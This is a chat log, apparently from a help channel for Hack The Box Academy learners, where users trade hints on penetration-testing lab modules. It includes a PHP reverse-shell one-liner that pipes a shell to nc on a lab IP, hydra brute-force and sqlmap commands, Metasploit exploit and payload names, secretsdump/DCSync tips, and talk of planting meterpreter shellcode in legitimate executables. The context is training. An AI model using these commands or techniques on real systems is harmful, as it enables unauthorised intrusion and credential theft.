or wait
nevermind i'm stupid
wait what
what's a PowerEdge server
Home: Dell poweredge server dual processor, with 5 TB in Raid array running Kali linux
is the kali running off virtualization software
no its installed directly
very similar to this
At work I am running off the university servers via hyperv. Tons of memory and storage available that way, but doing everything over a vpn is kind of slow if im not on campus
Huge Flex 💪
Anyone ever seen this error? Trying to use xfreerdp from the Pwnbox:
Ok it turns out running as root was messing it up
good to know..
Hey man, have you figured it out? Could you please give me a nudge for that
DM me
Hi everybody, I am on the RDP and SOCKS Tunneling with SocksOverRDP module; when I try to connect to the server at 172.16.6.155 with jason's credentials, it just falls down and sends me this. Could anyone give me a hint?
Can anyone help me on the ACTIVE DIRECTORY ENUMERATION & ATTACKS please?
Attacking Domain Trusts - Child -> Parent Trusts - from Linux. Perform the ExtraSids attack to compromise...
I think I compromised the machine but how to obtain the NTLM hash for the Domain Admin user bross after compromising the parent domain? really stuck on that for hours
@radiant dagger Try running secretsdump.py , i was able to authenticate with the adunn user we discovered in a previous section
I did not understand the trick challenge and what is required of me to do. Can someone guide or help me, please?
Thank you Jared, I got the flag with adunn and secretsdump. Although, I'm a little confused about the intended way. It looks like the question doesn't want us to use adunn
anyone around for a nudge on a specific LDAP query to look at GPO/password settings?
i don't know how to set up my VPN on the server
i use Kali Linux
I'm working on Password Attacks: Credential Hunting in Linux and I'm unable to brute force the initial password that's needed before the machine goes down. I've tried hydra and medusa and ftp and ssh. I've used the mutated password list and the regular password list. Could someone please DM the initial password?
I used the hint to finish footprinting easy, but what is the official way? I'm trying bruteforcing with medusa and it's pretty slow
now using hydra, couldn't fix medusa's speed in pwnbox
On the Pivoting, Tunneling skills assessment, is there any mod that I can DM? I think something is not working properly in the lab
Hello guys! Finally on the last part of the hashcat module (I've enjoyed it very much) but I don't really know how to extract the hashes from this file. Maybe you could guide me a little bit so I can get a foothold on this. Thanks!
@woeful oxide DM me 🙂
hey, looking for help in the Metasploit module. I'm on the sessions & jobs section. I found the service, which is elFinder, and now need to find an exploit for it, which I found; however when I run it, the session cannot be created. Can someone help?
Hi, I am looking for some guidance in the FILE UPLOAD ATTACKS module, Blacklist Filters. I can't seem to find any working PHP payload, all I get is a black screen. I have checked that I am using the correct extensions.
did you use x64 for the payload?
in that section you need to use an image extension to upload the payload and change the extension in Burp
any help for the Broken Authentication module Skill Assessment i got the support account but don't know how to decode the cookie
I used the reverse_tcp meterpreter payload
use linux/x64/meterpreter/reverse_tcp
that payload doesnt exist for the module
what module did you use
unix/webapp/elfinder_php_connector_exiftran_cmd_injection
i don't know about that module i use ||exploit/linux/http/elfinder_archive_cmd_injection|| and the x64 meterpreter payload
yea that was the other one that showed up,but why that one over the other one? the source code of the website even talks about the service using php connector
oh, I remember now, it did show 2 modules; I think I tried both and that one worked for some reason
yea but how to know which one to use without trying both
or maybe it's possible with the module i selected?
i don't know
if Metasploit shows a lot of modules I will do more enumeration and find more info about the service I want to exploit, but if it shows 2 or 3 I'm going to try all of them
okay, if someone knows if the other module works as well, or how to determine which to choose, please let me know. Thank you though
hi guys
How do you do that?
Can anyone give a nudge for the sql injection fundamentals final assesment. Still stuck at the login screen.. (figured it out, for anyone stuck on this look at the cheat sheet...)
Need some serious help with the Broken Authentication - Skills Assessment, been stuck for days
Feel free to DM me
hi guys, I'm stuck at the brute force module 'skills assessment - website': "Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside?" My command was hydra -l user -P '/home/wilsonchuah/SecLists/Passwords/Leaked-Databases/rockyou.txt' -f 157.245.33.77 -s 30896 http-post-form "/admin_login.php:username=^USER^&password=^PASS^:F=<form name='log-in'" but the estimated time is 240 hours. Am I going in the correct direction?
Ah OK thanks for that I'll give it a try...👍👍👍
OK that US VPN made no difference...the credentials don't work...possibly something wrong with the module of VM?
Update: It worked with the US VPN and the credentials mentioned. The server needs about 10 hours to start up 🙄🙄🤣🤣
Hello! Someone to DM about Footprinting Lab - Medium?
in cmd?
I think it depends where you type, that's very general 😛
If you mean for example, cmd, one way I can think of is the autocomplete with [Tab] (you have to type only first letters correctly).
(Maybe someone else can give you a better answer, dunno)
@west canopy Can I DM you about the Footprinting Lab - Medium?
hey, i need help at Vulnerability Assessment to the nessus skill asesment at the first and last question, anyone who can help me?
Can anyone help me with a sed, awk, grep or similar command that will remove all the words from my list that do not have any special characters?
echo '!?Normal text.%' | sed 's/[[:punct:]]//g'
In a regular expression, POSIX bracket expressions can be used to match one of a certain kind of characters.
How do I reverse this, where only the ones with the special characters are shown
You can DM me, if you still need help
sure
Hey All, i'm on the last question for AD Enumeration & Attacks, Skills Assessment 1: Take over the domain and submit the contents of the flag.txt file on the Administrator Desktop on DC01. I'm running into an issue with how to go about doing the DCSync attack with the user credentials i obtained in the previous questions. Any assistance would be appreciated!
@timber tide i just used proxychains + secretsdump.py and authenticated as the ||tpetty ||user
Thanks.... i think the proxychains is the piece I'm missing
Can I DM you for some more info about that?
sure
Ah sry I have not read your question properly. If you want to output all the lines of a file (I assume you try to filter a password list), which have only non special chars in it, you have to use: cat file.txt | grep -E '^[^[:punct:]]*$'
can anyone help with a nudge on the Active Directory LDAP final section? getting stuck on identifying user privs
@boreal sun for the last question on the skill assessment, try running whoami /priv from an elevated powershell
yeah i tried that but not getting it to accept the creds for the user account
You're not the first person who i have talked to who had this issue. When i last tested it, i was able to run powershell as administrator and still do it as htb-student
ahh ok - glad it wasn't just a user error. i figured that was the process, but wanted to check - just rebooted the machine and going to try it that way
ty for the help mate
np 🙂
sweet!
could anyone point me in the right direction on broken authentication predictable reset token? i cant figure out for the life of me why its not working
RDP command line errors in the module. Can't seem to connect as htb-student
@devout bear post your command and the error
sure
xfreerdp /v:<target IP address> /u:htb-student /p:<password>
@lethal atlas Thumbprint: c7:53:c8:76:45:0c:ba:59:a8:7c:a3:f9:a5:a5:4a:55:da:1b:06:76:b8:36:e3:97:04:59:19:63:7c:a1:07:b3
The above X.509 certificate could not be verified, possibly because you do not have
the CA certificate in your certificate store, or the certificate has expired.
Please look at the OpenSSL documentation on how to add a private CA to the store.
Do you trust the above certificate? (Y/T/N)
/rank
Who has solved the knowledge check on the Getting Started module?
and what happens when you say yes you trust the cert?
Can someone help me, how to prevent the 'Too many login attempts' in Broken Authentication -- Skill Assessment? I'm trying the: X-Forwarded-For: 127.0.0.1 as taught in the module, but It's not working
I used burp intruder and set a long delay between attempts.
How long delay did you use ? I have quite a big list still haha
i solved it with Python. I wrote a brute force script and set a timer after every 4 tries
time.sleep(timer)
did you find any information on the password requirements? like character types, upp/lowercase req. etc.?
Yeah I got the requirements and had some help to create a filter list
i didnt try to allow it
you have to accept the cert to continue
seems insecure
All the message was saying is that particular certificate was not found on your system.
you will get a similar message every time you connect to a new IP/HOST even with SSH.
ahh ok. thx. much appreciated
could anyone help me out with broken authentication predictable reset token? i have tried just about everything i could think of and still nothing
@lethal latch DM me 🙂
hi everyone i have been stuck on getting a foothold for a minute on getting started. from my understanding i create a php file with the below script
<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.109 4444>/tmp/f"); ?>
upload it to the image section of the nibbleblog and then use netcat to listen on port 4444, but every time I do it I get the same error saying it's an invalid local port
is there something I am doing wrong here?
can i see your netcat command
by the way thanks for helping with this again, i swear i worked on this before coming back to ask about this again
try running as sudo
same result
try doing: nc -lvnp 4444
i don't think the order of the options should matter but worth a shot
well today we both learned it does lol
nice
I've been trying really hard on the Information Gathering - Web Edition module. Frankly I find it to be the most difficult module I have done. Could I have some help with the skills assessment?
@raven cairn i got you dawg
I think a question in the module might not be working. Can someone double check???
Has anybody been able to get this question?
Hi guys, I'm currently doing the HTTP web requests module
heres a question from that module
The server above loads the flag after the page is loaded. Use the Network tab in the browser devtools to see what requests are made by the page, and find the request to the flag.
/flag_327a6c4304ad5938eaf0efb6cc3e53dc.txt
i got the flag
but it keeps saying my answer is incorrect
I think the flag is what is inside that .txt file
oooh
thanks
but this is the hint tho
Look for a request to a file called 'flag_...'. If you can't find it, refresh the page and monitor new requests.
This didn't work for me. Are you sure this works?
you can use netcraft for this question, you can find the answer in "Hosting History"
Port-scanning something you don't have permission to is usually a big no no
@raven cairn ayyyy it worked tysm
Yes typically we shouldn't be nmapping public websites or IP's
Yoooo. Thanks!
Well the module differentiates between active and passive information gathering
but it has you do active reconnaissance on other public targets i believe
i feel like using curl and using nmap aren't that different in the grand scheme of things.
Yea there's no law against port scanning so it's more like an ethical issue
as long as you aren't actively disrupting service, im sure
not to mention any company with a program would be used to people scanning them
yup. I wonder about that though, if you're testing through a popular VPN if it'll start denying service through that node. Do providers rotate their node IPs so they don't get blacklisted?
I'm guessing they would anyway, as a routine of security
Hey guys. Traffic analysis module (chapter: Interrogating Network Traffic With Capture and Display Filters)
question: What are the client and server port numbers used in first full TCP three-way handshake? (low number first then high number)
I know the answer and see that handshake (the answer consists of two ports) but it's still incorrect and I don't understand what kind of answer this question wants.
@frigid vector DM me 🙂
considering that there are bots that exist that slowly go across the internet and scan ports i think most if not all companies IT team should be ready for some level of scanning on their public facing devices.
i think it was a Jack Rhysider video i heard about it from first. The one he talked about i believe was bots that would scan ports, find your ssh port, and then try to login with default credentials.
Present your query, without giving much of spoiler
Don't ask to ask, just ask
My question is related to the very first part so no spoilers... I have no idea what exploit to use on what port. I have tried so many things with nothing to get me started. I have seriously tried for days
feel free to DM me any help if you can
sorry I didn't reply directly to you
DM me showing your efforts
We'll figure it out
hi, i need some help for the Broken Authentication module Skill Assessment i got the support account but don't know how to decode the cookie
Using the tools shown in the module will help you with that 😉
which one or in which section
Not 100% sure but would burp suite be the tool?
the decoder in burp?
That would be my go to, but like i said 100% have not done that specific module yet
can anyone give me a nudge with the File Upload Attacks skills assessment? I have found a handful of extensions that work, I know where the uploads end up, but for the life of me, I can't do both at the same time!
hi, did you manage to find the answer for that question i'm also stuck
did you read the source code
and after you upload a file it will be renamed, so make sure you can find the file and read the source code for that part
I assisted him with it. Use cyberchef to decode the cookie. And make sure you are looking at the correct cookie, aka NOT the PHPSESSID cookie.
oh i'm idiot thanks
Yeah, i read the source code. I can find files that are uploaded, but not my malicious ones for some reason
did you use special character to name your payload
I did...but I changed...just reverted the box and it worked though!!
Has anyone had trouble staying connected to a target? Everytime I spawn a new target and try to navigate to it. The wait time is incredibly slow and, within ten minutes I get "unable to connect" even to a page that I was previously connected too.
some people have weird issue with the special character so try without it maybe or dm me
oh, and also I'm confused in the Guessable Answers section: am I supposed to answer all of the unguessable questions until I get a guessable one?
Hi Team, Need help with answers to 'Sessions' chapter within 'Using Metasploit Framework' Module. Is there any walkthrough or any other demonstration/notes ?
Yes, only 1 question should be guessable and the rest are theoretically not guessable.
So just rotate them and only seriously answer the guessable one
this place is awesome
so I rotated the unguessable questions 97 times and still don't get a guessable one. Which question is the guessable one?
I believe it's favorite color?
This is still a problem for me...It worked once when I tried a different VPN but it no longer works...is there a general problem with this module?
stuck on the second question for conditional statements and loops of the Python module
I've written the script and it works but the website won't accept my answer. Code block 2
just print the variable.
what do you mean I tried the output, I tried list_2 and I tried print(list_2)
edit: print(num) works
got onto FreeRDP connected to an empty workstation with just a recycle bin... no drives, no directories... can't answer the questions
am i missing something in the bloodhound module? im not seeing a windows instance to start for testing against - the only thing i can spawn is the pwnbox
nvm got it
looks like I'm also getting an invalid collector error from the .zip files provided for the module. Anyone else having this issue? Can't find anything on the forums for it
@boreal sun Yes, I had to use Pwnbox because the bloodhound on my VM was not compatible with their data
@boreal sun First section there is no target and they give you the data to analyze. The second section you actually connect to a target and run a collector, then analyze.
ok cool - was just checking whether it was a "follow along" or just a "read and learn" portion for the first bit
thanks mate
@hazy cradle if you still need help feel free to DM 🙂
Hi, have you been able to solve that? I'm having the same problem. I got the shell, tried several exploits for "sudo", none of them seem to work... Thanks
@west canopy do you biohk with TRT?
i take a cheque drop every morning instead of drinking coffee
@rugged stag DM me 🙂
Hi everyone I have a problem at module Web Attacks section Blind Data Exfiltration . Can someone help me ?
@golden hornet i might be able to help, DM me
ok
Am I doing this wrong? SQLMap module:
I'm getting this everytime I try to solve case #8, by using this command: sqlmap 'http://159.65.29.54:32279/case8.php' --data 'id=1&t0ken=7Y4mOvfC21UegPCj3fNcRGkWyhaY0fWVEWMszissHk' --csrf-token='t0ken' --batch
you forgot a = between data and ‘id
--data='id=1&t0ken=7Y4
Hi can anyone assist with windows privilege escalation dnsadmin section?
Read on the forums that we should use an msfvenom reverse payload, but the DNS service can't seem to start back up
Hey, I'm currently on Web Info Gathering module and i don't quite understand how do i pass Active Infrastructure Gathering with these vHosts
What am I supposed to do here, i haven't found how vHosts operate in any other sections
read up on zone transfers
@delicate drum are you on the 'Active Infrastructure Identification' section?
Yeah
have you edited your /etc/hosts?
Nope
thats it
thats definitely it
Haven't found anything about that in the module tho
it's in earlier modules, but essentially, servers that are running separate web apps are 'virtual hosting', providing separate sites on the same IP, same server
Read about that, but didn't see how to setup one, or if that's even needed
Btw I'm using an already built path from the academy and went through all the modules before this one, perhaps I've missed something about them
Because the websites you are trying to access are not listed on any dns server. IE not public. you need to make an entry in your /etc/hosts file so that your OS knows where to find that name.
Oh that actually makes sense now
anyone ? ):
that is why you provide an IP and the domain name
sorry ive overwritten ur question
haha no biggie mate.
@summer lake I cant help. I havent done that module yet
@summer lake lol sry dude I haven't got that far yet
maybe if @west canopy is on he can help
I assume theres a place that can teach me how to edit my entry and get it to work
nano /etc/hosts
and add the ip with the corresponding domain name
thanks mates <3
👍
1 more thing, what's the format i use to access vHosts, vHost@ip or?
fun project, you can set up a local webserver on your LAN, then you can add it to your /etc/hosts file with whatever URL you want, as it takes precedence over other DNS sources, and when you type it into your browser it will come up
that, and if you have a cloud server running somewhere, you can do the same thing, saves from having to remember the IP. You could make it "mycloudserver.me"
@summer lake this section took me several attempts and I had to respawn the target several times. I don't recall any particular trick to making it work besides working through the steps as slowly and meticulously as possible.
Ah. So the dns not restarting is kinda "normal"?
yea i ran into that
Tried it more than 10x. only worked twice with the cmd dll so far.
Alright. Thanks,! at least i'm on the right path
eventually i got a reverse shell to work
Respect your persistence tbh
What is going on with this academy Tunnelling and Port Forwarding module? I keep getting this after connecting to the VPN and trying to SSH to the attack host. I'm seriously considering cancelling my subscription... this is unacceptable
@paper crag which section is that? I can test on my end.
Meterpreter Tunneling & Port Forwarding...but it was the same on the previous section too...
Working fine on my end:
will try once I finally understand all of this DNS and enumerating stuff
I'm still stuck on the same module, can't find FQDN from an iP address
Have you tried dig -x ?
not sure, whatever i try i get DOMAINX error
or something along those lines
but I've tried dig any, shouldn't that do the -x too?
hmm, just remembered that whois might work for ya
heck, i don't supposed ping resolves it for ya, does it?
whois outputs thats its a private registered ip
ping doesn't respond
I might have misconfigured something perhaps?
Which module? I'll check my notes, or just spin it up.
Web Information Gathering, Active Infrastructure Identification section
I've somehow (not even I know how) managed to get some questions right, but I can't get the FQDN from those 2 IPs provided in the questions
Can someone nudge me on the "Attacking common application" module?
Stuck at the WordPress - Discovery & Enumeration questions.
Can't seem to find what is needed, although not enough info from the course, tried everything manually
@oblique acorn Edit: Which question are you stuck on?
any luck?
Can I have help decoding the cookie? I don't know how I am supposed to do this without help...
@raven cairn I'm not an expert, but I believe cookies are url encoded before they're sent, have you url decoded it yet?
Yes.
Cool, then since they've said it's md5, and that the last character is missing, either find a tool to append the string with each alphanumerical and decode md5 until it works, or just add them on yourself and decode
you could probably also make a bash script, and use md5sum to fiddle with it
hey guys, I need help with the INFORMATION GATHERING - WEB EDITION/Active Subdomain Enumeration, in the question about the 2 IPs, I tried the subdomain commands but they gave me NXDOMAIN
@mellow maple what did you use to enum?
yes but got one zone
I have a question regarding the sqlmap modules. For flag 7 I ran a command I thought would work and it didn't, I slightly altered the command and it didn't work, so naturally I ran the first command and it worked... is this normal sqlmap behavior?
SQLmap as a tool works great. It might have been a problem on your end.
I doubt it was a problem with the tool tbh
hmmmm on the pwnbox end, maybe. Just wondering if anyone has had similar behavior
I've never had that happen to me.
(Also if anybody is still here I am still suffering on the skill assessment)
Hey all, while doing a Linux module, the question is “What is the name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k?”
Now I found the correct file, but when I look at the file more closely, the size is 34266. I don’t understand how that’s the right answer, as 34266 is not smaller than 28k…. Am I missing something obvious?
I think It is using a different measuring system.
That’s probably it, when you use stat or -lisan on files it displays in bytes instead of kb right?
Actually the kb- byte thing still doesn’t account for the number
Which sqlmap commands did you run..?
DM me we'll look into it
Need any nudge?
hi everyone, have you finished file inclusion module?
Hey guys in the Information Gathering module under the Active Infrastructure Identification, I added the hosts to /etc/hosts
After that, the domains app.inlanefreight.local and dev.inlanefreight.local are still not showing up
Can someone help me out?
Module: Using Metasploit Framework, section: Session & Jobs. The target system has an old version of Sudo running. Find the relevant exploit and get root access to the target system. Find the flag.txt file. I have found the relevant exploit using local_exploit_suggester, which says that exploit/linux/local/su_login: The target appears to be vulnerable.
However, when I used that exploit, it says "[*] Exploit completed, but no session was created."
Could someone help?
Hey I did that question yesterday, I can help u if ure still stuck there
I believe I had problems trying to solve it using zap
If ure using ur own vm and connecting over vpn, make sure u set ur LHOST to ur tun0 ip, not ur real ip
Done with no luck..thanks..
try changing the RPORT to something else
maybe the app is listening on a specific one
guys is it possible to inject a payload into a normal .exe and then get a meterpreter shell out of it once executed?
Yeah its possible
You can inject malicious shellcode straight into legitimate binaries too
but does AV software pick it up?
Depends
what do you mean?
depends on the software or
also, so it doesn't have to be an exploit? it can just be a reverse shell payload and work?
Yeah just search around you'll get detailed blogs and write-ups doing the same
Very helpful in windows privilege escalation
how is it more useful in priv esc rather than gaining foothold?
Maybe wrong exploit. It's not su, sudo...
We can use it in both the scenarios
Yo @mortal basin
I noticed something very very very weird about burp suite community edition while doing "Using web proxies" module,
I need to show you that stuff
Can I DM you?
@delicate drum pls be careful with spoilers...
Sure
I'm sorry, won't happen again
On the skills assessment for hacking WordPress. I've tried two methods for obtaining a shell, but no luck. I'm confident I'm on the right track, I just can't figure out why I'm getting the errors I'm getting. Any help would be 😃
I keep getting my payload listed on the page
Anyone online who solved the Password Attacks: Password mutations? Used 3 hours bruteforcing and this is starting to feel ridiculous. The instructions seem clear, but just keeping on slashing at the box seems obnoxious. Anyone? 🙂
Just bruteforcing or are you using rules?
The zip comes with a password list and a rules list. Both are used, cutting duplicates. I have now separated the mut_password.list into files based on length and started with a word length of 8, then 9 and now I am on 10. I feel like this is taking way too long.
Already read a hint of using ftp instead of ssh because it is faster. So I am already doing that
Got it! It is not okay that it should take this long! 😢
I would suggest investigating why it took so long, afaik HTB always makes sure that when bruteforcing is involved the time needed is short
at least for the main platform, I have no idea if they keep that philosophy for academy
Hey, new here. I could use some kind of help/lead on the broken auth skill assessment.
new and attempted broken auth? Go for the glory dude.. lol hit me up in DM and I will try to help
does anyone have a hint for dealing with [ERROR] unable to retrieve the number of columns for table 'tbl_a' in database 'db_a' when using sqlmap
you can break his authentication but you can't break his spirit!
Anyone up to help me solve questions in Information Gathering - Web Edition > Active Subdomain Enumeration, can't seem to find FQDNs from the given IPs?
you have to do a zone transfer on one of the subdomains found from an earlier question.
but there's like 20 subdomains
yeah, sounds about right
so I have to go through all of them until I find the corresponding IP?
yes
nice
luckily it's not far down the list.
I feel like that section needs to be updated with better directions. Literally everyone gets stuck on that section , myself included.
i see it get asked about at least once every two days
This is my first time getting stuck for more than half an hour
Been here for a day and still can't even grasp
Im stuck on the machine Trick on HTB
I've done the easy ones and went straight to academy
What am I doing wrong, the IP is generated and ns.inlanefreight.htb is the nameserver
you're not trying the transfer on a subdomain
I've gotten the list of all subdomains somehow yesterday and now can't manage to do it again xd
nslookup -query=AXFR inlanefreight.htb ns.inlanefreight.htb
or
nslookup -query=AXFR inlanefreight.htb <target ip>
is your target active or did it timeout
and is that entry in your /etc/hosts?
try running the command: dig axfr inlanefreight.local @ipaddress
but replace inlanefreight.local with a subdomain
and go down the list
you keep the original IP address of the spawned target
and then try doing a zone transfer against each subdomain
I never did anything with my hosts file.
@west canopy how did you communicate with inlanefreight.htb without changing your hosts file
it shouldn't know how to find it
it's a dns zone not a vhost
one sec let me test from pwnbox
real quick
Yea I just tested and you don't need it in the hosts file
maybe it being there conflicts with it
interesting. I'm not sure how that works but ok
I cannot figure this out for the life of me. It's probably something very simple
What is the alias set for the ipconfig.exe command?
Module: using MSF, section: Meterpreter
nmap shows this
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5000/tcp open upnp
how to select right exploit from this info ?
thanks..let me try
got it..thanks
Can I get an admin to help with the AD enum and exploit module
I'm on the last part, skill test 1
Confused on how to get to MS01 for this question: Submit the contents of the flag.txt file on the Administrator desktop on MS01
Can anyone guide on the following:
I am reading through the Web Attacks - Out-of-bound data Exfiltration section. The following command is used in BurpSuite:
Should there be more XML in the request shown in BurpSuite?
At one point the notes / text mentions the following:
Then the subject changes to creating the php script
Link for your reference: https://academy.hackthebox.com/module/134/section/1207
@round magnet we need to set up port forwarding , in order to pivot to machines on the 172.16.6.0 network. If you need help feel free to DM me 🙂
anyone around for a nudge on the last question for the "putting it all together" in the bloodhound module? every query I've run is returning me a "dive by zero" error
lol, sry haven't done it
all good homie! I wanted to give @west canopy a break from answering me lol
hah, ya I can't wait to get to that point, teaching is supposed to really drill in the knowledge
@boreal sun When you're at that point I'm sure I'll be the one asking you everything
anyone has a clue why vimtutor doesn't run once I enter the command?
Returns the following bash: vimtutor: command not found
@weary stream looks like it needs to be installed
hmm weird, thought it would come as standard when vim is installed on pwnbox
I think we can just sudo apt install vimtutor
so I'm doing Tier 1 starting point, box 8. Tactics, simple SMB login, and the writeup recommended trying the -impacket- framework, ran into a missing module issue, and the forum fix was to use "$: sudo pip3 install . " works like a charm, but I'm confused, I thought pip3 was a package manager type thing like apt or rpm, and I don't see anything new installed in the directory, so what happened?
E: Unable to locate package vimtutor
Weird right?
Flag 5 on SQLmap Essentials not working, can anyone help with that??
after this night if still issue dm me
dm me
ah ok, i did not know that the lab was that involved to require this. thank you for your advice !
Hello there, I'm kinda lost at the LFI assessment module, I've tried multiple ways to bypass it but I ain't able to do it, could I get some help? Thanks!
Can someone help me? I am doing the setting up module but at some point I can't follow the steps because I have something else? I downloaded Parrot but I don't have the thing called "bash"
bash is the interpreter in your terminal, or command line
what should that mean? (I am very sorry about the dumb questions, it just doesn't work and I don't know why)
np, so look through your utilities or programs, find something called 'terminal', it's where you'll enter commands for programs and other stuff
bash is the interpreter that will run what you type in there, it's not something you'll have to install
I'd hit up youtube, and search for 'bash tutorial', or 'terminal tutorial linux', it'll help you out more than I could
Thank you so much !
np, glad I could help
I'm doing the windows Fundamentals Module
In the windows services and processes section, even if I'm 99% sure I'm submitting the right answer it does not accept it
Anyone had the same problem? Or anyone that can help me more in depth? Maybe I just think that is the right answer but is not...
sometimes, I've found some modules require your answer to fit their format, like include quotes or dashes or slashes, I've gotten hung up a few times that way
"Identify one of the non-standard update services running on the host. Submit the full name of the service executable (not the DisplayName) as your answer."
But this looks like a well specified question
It even specifies that I need to write the Name and not the Display Name
mba
Btw guys how am I supposed to buy a tier 1 module if I only have 40 cubes? like is there a way to farm cubes or is the only way to buy them
@potent badger I haven't done that module, so unfortunately I can't help that much
No problem, thank you anyway.
👍
